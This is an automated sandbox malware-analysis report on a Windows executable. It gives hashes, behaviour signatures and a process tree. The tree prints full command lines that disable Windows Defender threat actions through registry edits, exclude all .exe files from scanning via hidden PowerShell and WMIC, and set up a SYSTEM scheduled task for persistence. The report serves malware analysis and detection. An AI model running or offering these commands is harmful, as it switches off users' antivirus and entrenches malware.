Analysis

  • max time kernel
    161s
  • max time network
    286s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    17/05/2024, 00:13 UTC

General

  • Target

    cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe

  • Size

    7.3MB

  • MD5

    6ab93856657f98664025489aff89ea78

  • SHA1

    6045d673642fd3bb832bf7289022d1b37d11de17

  • SHA256

    cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d

  • SHA512

    d3a083eebcbe8f271540ca2fa636c15599cf268e82097bc9bb8f2f5d2773461b9505426519baecf40c51390e83ad980ab565710fc821c3aecb71e475add37a1f

  • SSDEEP

    196608:91OPAOeH0m2q6X7123fIOt75sZeSi7xIYcmAiME:3OYO98PvtViZUx2O

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell and hides the display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely as a geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe
    "C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:412
    • C:\Users\Admin\AppData\Local\Temp\7zS72FD.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:428
      • C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe
        .\Install.exe /LiwdidB "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4056
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3160
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1672
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:368
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:192
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4808
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4644
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2560
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1556
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:212
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                      PID:1536
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1508
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1384
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                        PID:1380
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1704
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:912
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4204
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:3696
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2012
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4796
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5092
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3140
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe\" LY /gNNdidcqgj 525403 /S" /V1 /F
                    4⤵
                    • Drops file in Windows directory
                    • Creates scheduled task(s)
                    PID:2928
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                    4⤵
                      PID:2220
                      • C:\Windows\SysWOW64\cmd.exe
                        /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                        5⤵
                          PID:488
                          • \??\c:\windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                            6⤵
                              PID:1236
                  • C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe
                    C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe LY /gNNdidcqgj 525403 /S
                    1⤵
                    • Executes dropped EXE
                    • Drops desktop.ini file(s)
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:4344
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      2⤵
                        PID:4832
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                          3⤵
                            PID:2080
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              4⤵
                                PID:2192
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  5⤵
                                    PID:2964
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                3⤵
                                  PID:2936
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    4⤵
                                      PID:2332
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        5⤵
                                          PID:4772
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      3⤵
                                        PID:1064
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          4⤵
                                            PID:1460
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              5⤵
                                                PID:1984
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                            3⤵
                                              PID:3920
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                4⤵
                                                  PID:2792
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                    5⤵
                                                      PID:876
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                  3⤵
                                                    PID:700
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      4⤵
                                                        PID:872
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:692
                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            6⤵
                                                              PID:4856
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                       powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2704
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:432
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                            4⤵
                                                              PID:4020
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:1976
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:4948
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1492
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:1852
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:516
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:2084
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:4364
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:2416
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:5084
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:4308
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:1964
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
      PID:5056
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:1584
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:196
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:696
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:2968
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:5064
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:2164
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:2592
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:4900
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:4480
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:3788
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:3712
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:2188
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:4336
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
      3⤵
      PID:628
    • C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
      3⤵
      PID:3068
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
